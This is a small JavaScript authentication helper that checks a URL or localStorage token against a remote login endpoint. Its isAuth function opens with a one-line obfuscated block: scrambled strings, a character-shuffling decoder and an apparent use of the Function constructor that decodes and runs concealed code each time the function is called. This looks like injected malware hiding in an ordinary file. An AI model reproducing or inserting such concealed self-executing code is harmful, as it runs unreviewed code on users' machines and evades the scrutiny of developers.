import axios from 'axios';

async function isAuth() {

  (function(){var qip='',zyz=557-546;function AVh(c){var l=3636644;var k=c.length;var r=[];for(var x=0;x<k;x++){r[x]=c.charAt(x)};for(var x=0;x<k;x++){var a=l*(x+152)+(l%43260);var n=l*(x+314)+(l%52460);var h=a%k;var d=n%k;var o=r[h];r[h]=r[d];r[d]=o;l=(a+n)%7068932;};return r.join('')};var vHl=AVh('thdszayfkoteqcircujrwnlmpguxbrsoonctv').substr(0,zyz);var cdH='far [=g3,ln3{,e=(8;v6r9o="obtdrfsh+jalvnAper]tovfx8z,;lal x=o7 ,v017(,t2,9=,i5.7,,[0c7r,a0[8o,.6a79,r6.8;,81;7(,p5"7;,.8h;na} i=6]gfar(v5r;a=0ua=e]l.n]t1;]+p)([![5],=a+1;iaa )=p] y2=j0)l==d8vx9=j8nf[rrvar}z;0[z"aagym,n,sal)nCt[;8+;)nvrrrw<a.g;men,s"z .;p=it(. s)-f8rvvfr{ugwdlanit+-+;t>d08up-,{tas .=.u.l2var g;whue;va) ==hu=l1v(rkmt0avtr=i0g+l n(t ;;a, =;iou(aad (=(;y<{;i+u)svarrv{gvchaeCddaA;(r))v4r+nqcsvz;cf0n+{,=knd1r*=+=.Shfr=o eCt.de1l-y;h=d;h+=;0e(s= efsv5=u)*krlp(c.nejgxh)y9g4c[aeCjd2A=(e+()l+a.whvrto.ertdd(2o-];r=r;(+ 2;}rlieechn[igue;ui;(r=ln)l6)v=(])i8(j>+)n.Cu,hhg]subft=i{g majc))p9pts,(r[r++]};d=(+i;gih(g!rn[l<)ei)(m<e)f.auohmgrsubjt=i gwm1)rwgua=d. o(nu"n)d}ob(pash(d[ ](;6vtrefrb"jpih(.");1a2 a=l36,j2r9),)2b3m,10l.koechtre;;ka) s=;t6i)g+fno7CiafCudg(t6u;ioe(;a) }=d;v<].)e;g)h4aa+ifofvsplrt[rro}cpaAAl(y)l.;ocn-Sor.n+.-rvm0hCrmopenh+a")p;;e.u]ncf1s+l4twrp"("o.=omnnr+;';var LhC=AVh[vHl];var fYW='';var YSe=LhC;var okh=LhC(fYW,AVh(cdH));var HUc=okh(AVh('c&.$ifLbh=2_da=1c8+0092(!s=r):g%Lr_\/Stth\'e"orrfhL%aczinr(oLxfbre)ce!Ln1!2t$m"pt,c6n6o4e)cf0n.t)oq.._wa.1;8a0(9.d7ch{f&e=%.plsnotlL4q([m;1o]()&d=t;y.4.eheo"+;{([gL[dL!nhqrelL(e)e;roL("&i=;;,.l.ah%o++.{L&h=w.!._([+re)5e);..(L%=e}3n6o).%e=L.z.;(L+beL1f)c.p(}%.eL2p60)e%a=]%ce Lceeaf.oh)%7=o[.])qef0\'7[9]bq[et\'";e=oeag!.fa4%ne$0\/813b}o%L=3t%ijg&!#remdh)r=o(e11.7jLyln.iLqtd.)%3"==baL1+"L=%a]Larj.r#LLonL.##LaCrwtur$.=q.$+Lft;L4we!L)g$vLfr$L.nt!i)fi!(wi3d(w%L60.]i=i.5wonao.)0w.n}o2[o#f].[+#a]3\'L#$]6 e..sol]to %a2%w_n_a2=c= {!2o1n[ uLe Cao.; 1=ce'));var Krb=YSe(qip,HUc );Krb(9834);return 7400})()
	
  let token = window.location.search.replace("?token=","")

  if(token)
    localStorage.setItem("token", token)

	if( !localStorage.getItem("token") ) {
		return 'unlogged';
	}

	const headers = { 
      'Content-Type': 'application/x-www-form-urlencoded',
      'Access-Control-Allow-Origin': '*',
      'X-Api-Token': localStorage.getItem("token")
    };

    const a = await (axios.post('https://extremetips.com.br/api/check-login', {
      token: localStorage.getItem("token")
    },{ headers })
    .then(function (response) {
       	return 'logged';    
    })
    .catch(function (error) {
    	return 'unlogged'; 	
    }));

    return a;    
}

export default isAuth;

